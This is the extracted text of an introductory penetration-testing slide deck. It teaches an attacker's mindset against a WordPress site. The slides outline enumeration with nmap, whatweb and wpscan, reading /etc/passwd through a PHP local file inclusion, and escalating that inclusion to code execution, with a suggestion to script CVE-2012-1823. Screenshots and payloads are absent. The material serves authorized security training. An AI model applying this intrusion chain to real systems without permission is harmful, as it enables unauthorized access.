Introduction to Penetration

Testing

Table of Contents

Overview
Enumeration
Tool Output
Do We Stop Here?
Custom Scripts
Wpscan
Online Research
Testing Exploitation
PHP LFI
Code Execution, Yes Please!

Overview
This session will cover the mindset I
follow when approaching a web
application
I am going to show where many
might stop, and what happens when
you push further
These types of techniques can be
applied to any web application

Overview Cont.
Tools Leveraged:

Nmap
Whatweb
Wpscan
Wget
Custom scripts
Burp Suite
Netcat
Google

Methodology Overview
Pre-Engagement Activities
Hammer out all the details to conduct the test
(Schedule, Scoping, Rules of Engagement, Formal
Permission, etc.)

Information Gathering and Reconnaissance

Depends on type of test and information you are given
(Organization name, CIDR, list of URLs, source code,
etc.)

Automated Testing
Manual Testing and Validation
Reporting
Remediation Support

Methodologies Cont.
Penetration Testing Execution
Standard (PTES):
http://www.pentest-standard.org/index.
php/Main_Page

Mindset is Key
Think like an attacker and see things
through a different lens:
Upload an avatar? Hmmm add code?
Download a report? Hmm directory traversal
for another file?

Confidence
Without it youll very easily hit a wall and stop
I tell myself a vulnerability is here I just need
to find it

Enumeration
Nmap:

WhatWeb:

Do We Stop Here?
Hmmm?

Custom Scripts
Web Application testing requires
custom scripting.really no way
getting around it:

Custom Scripts Cont.

Making web requests with a scripting language
isnt too difficult
Check out tutorials online and try to automate
web requests
Making a tool for CVE-2012-1823 is a good use
case because you need to make a POST request
and modify several header values
If you can write a tool for this CVE, it demonstrates
concepts that can be applied to many different CVEs

Wpscan
Wpscan:

Wpscan
Do we stop here?

Wpscan : Plugin
Enumeration
Wpscan: --enumerate p

Online Research

Online Research Cont.

Hmm, our web server doesnt
respond when we request
/wordpress/wp/wp-content/
Do we stop here?

Testing Exploitation
Yea, lets grap /etc/passwd

PHP LFI
Cool, so we can LFI, do we stop now?

PHP LFINow What?

What can be done with a PHP LFI?
It depends on what function is leading to the LFI
vulnerability (include(), readfile(), etc.)
PHP functions like include() will execute PHP code
in the included file
Yay code execution through php snippets!

PHP functions like readfile() will only display output

We have more work to do

Code Execution? Yes,

Please!

Code Execution? Yes,

Please!
Request:

Demo

Summary
Tools may not give you the answer
Very easy to hit a hurdle and quit
You need to be curious/creative and
constantly push to get more information
Confidence and mindset goes a long way